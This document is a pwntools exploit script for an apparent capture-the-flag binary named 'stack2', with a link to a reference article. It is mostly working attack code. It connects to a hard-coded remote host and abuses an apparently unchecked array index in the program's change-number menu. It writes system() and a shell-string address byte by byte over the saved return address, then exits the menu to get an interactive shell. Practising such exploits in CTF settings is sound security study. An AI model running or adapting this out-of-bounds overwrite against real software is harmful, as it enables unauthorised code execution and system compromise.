参考文章
https://blog.csdn.net/qq_43681242/article/details/104077461
exp
#!/usr/bin/env python
#coding:utf-8
from pwn import *
# Local alternative to the remote tube below: p = process('./stack2')
# The endpoint is hard-coded; presumably a per-session challenge instance,
# so expect to change host and port before a re-run.
p = remote('111.198.29.45', 58596)

# Fixed addresses inside the target. Neither name is referenced again in this
# listing: the same two values are sent byte by byte, little-endian, by the
# write_adrr() calls further down.
# NOTE(review): the names suggest system() and a "sh" string; the binary is
# not shown here, so confirm both against it. Hard-coded code addresses only
# hold if the target is not position-independent.
system_addr = 0x08048450
bish_addr = 0x08048987

# Index of the first byte overwritten (0x84 == 132), counted in the target's
# one-byte "numbers". Presumably the distance from the start of the number
# array to the saved return address -- confirm in a debugger.
leave_offset = 0x84
def write_adrr(addr, va):
    """Use the target's menu option 3 to store one value at one index.

    Sends '3', answers the 'which number to change:' prompt with ``addr``
    and the 'new number:' prompt with ``va`` (both as decimal text), then
    reads up to the end of the next menu ('5. exit').

    Talks over the module-level tube ``p``. ``addr`` is passed through
    unchanged as the index the target asks for. This script calls it with
    indexes of 0x84 and above after declaring a single number, so the
    target presumably applies no range check to the index (binary not
    shown here -- confirm).
    """
    p.sendline('3')
    p.sendlineafter('which number to change:\n', str(addr))
    p.sendlineafter('new number:\n', str(va))
    # Resynchronise on the menu so the next call starts from a known prompt.
    p.recvuntil('5. exit\n')
# Opening dialogue: declare one number, give it the value 2, wait for the menu.
p.sendlineafter('How many numbers you have:\n', '1')
p.sendlineafter('Give me your numbers\n', '2')
p.recvuntil('5. exit\n')

# Every index below is 0x84 or higher although only one number was declared
# above. The writes can only land where this script expects if the target's
# "change number" handler accepts an index without comparing it to the count
# (inferred; the binary is not shown). A bounds check in that handler would
# reject all eight writes. Because the writes are addressed by index rather
# than by a contiguous overrun, a stack protector alone would presumably not
# flag them.

# 0x50 0x84 0x04 0x08 is 0x08048450 (system_addr) in little-endian order.
for _idx, _byte in enumerate((0x50, 0x84, 0x04, 0x08)):
    write_adrr(leave_offset + _idx, _byte)

# Move two 4-byte words further on.
# NOTE(review): under the 32-bit cdecl layout that slot would be the first
# argument of the function returned into -- confirm against the binary.
leave_offset += 8

# 0x87 0x89 0x04 0x08 is 0x08048987 (bish_addr) in little-endian order.
for _idx, _byte in enumerate((0x87, 0x89, 0x04, 0x08)):
    write_adrr(leave_offset + _idx, _byte)

# Menu option 5 ("exit") ends the menu loop, so the function returns through
# the overwritten slot; the tube is then handed to the terminal.
p.sendline('5')
p.interactive()